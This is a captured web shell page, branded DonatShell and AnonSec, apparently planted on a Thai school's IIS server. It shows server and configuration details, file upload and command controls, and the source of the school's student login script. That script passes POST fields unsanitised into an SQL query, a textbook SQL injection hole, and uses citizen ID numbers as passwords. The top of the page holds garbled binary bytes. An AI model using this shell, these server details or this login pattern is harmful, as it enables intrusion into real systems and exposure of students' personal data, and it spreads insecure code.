%PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµù Õ5sLOšuY Donat Was Here
DonatShell
Server IP : www.kowitt.ac.th  /  Your IP : 216.73.216.110
Web Server : Microsoft-IIS/7.5
System : Windows NT SERVER02 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.6.31
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /inetpub/wwwroot-25650203-BK/wwwroot/mis/student/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ HOME SHELL ]     

Current File : /inetpub/wwwroot-25650203-BK/wwwroot/mis/student//checklogin.php
<?PHP 
    session_start();
    include "mis/conf.php";
    $sql="select eduYear,eduTerm from LT_SetYearTerm where DateStart<= getdate() and DateEnd>= getdate()";
    $stmt = sqlsrv_query( $conn, $sql );
    while( $row = sqlsrv_fetch_array( $stmt, SQLSRV_FETCH_ASSOC) ) {
        $_SESSION['EduYear'] = $row['eduYear'];
        $_SESSION['EduTerm'] = $row['eduTerm'];
    }

    $sql= "select IDStudent , IDCitizen as IDCitizen,PRename+NameFirst+'  '+NameLast as StuName,PClass,PRoom,PClassNo,PLevel 
,(select top 1 PreName+NameFirst+'  '+NameLast as ADV1  from TTeacherAdviser inner join TTeacher on TTeacher.IDTeacher = TTeacherAdviser.IDTeacher where AYear='".$_SESSION['EduYear']."' and Term='".$_SESSION['EduTerm']."' and PClass=TBStudent.PClass and PRoom = TBStudent.PRoom) as ADV1,(select top 1 PreName+NameFirst+'  '+NameLast as ADV1 from TTeacherAdviser inner join TTeacher on TTeacher.IDTeacher = TTeacherAdviser.IDTeacher2 where AYear='".$_SESSION['EduYear']."' and Term='".$_SESSION['EduTerm']."' and PClass=TBStudent.PClass and PRoom = TBStudent.PRoom) as ADV2 from TBStudent  where IDStudent='".$_POST["IDStudent"]."' and IDCitizen ='".$_POST['Password']."' and Status=1";
    //echo "sql : ".$sql."<br>"; exit();
    $stmt = sqlsrv_query( $conn, $sql );
    if( $stmt === false) {
        die( print_r( sqlsrv_errors(), true) );
    }
    $return = "0";
    while( $row = sqlsrv_fetch_array( $stmt, SQLSRV_FETCH_ASSOC) ) {
        $_SESSION["IDStudent"] = iconv("tis-620","utf-8",$row["IDStudent"]);
        $_SESSION["StuName"] = iconv("tis-620","utf-8",$row["StuName"]);
        $_SESSION["PClass"] = iconv("tis-620","utf-8",$row["PClass"]);
        $_SESSION["PRoom"] = iconv("tis-620","utf-8",$row["PRoom"]);
        $_SESSION["PLevel"] = iconv("tis-620","utf-8",$row["PLevel"]);
        $_SESSION["PClassNo"] = iconv("tis-620","utf-8",$row["PClassNo"]);
        $_SESSION["ADV1"] = iconv("tis-620","utf-8",$row["ADV1"]);
        $_SESSION["ADV2"] = iconv("tis-620","utf-8",$row["ADV2"]);
        $_SESSION["IDCitizen"] = iconv("tis-620","utf-8",$row["IDCitizen"]);
        $return = "1";
    } 
    
    echo $return;
?>

Anon7 - 2022
AnonSec Team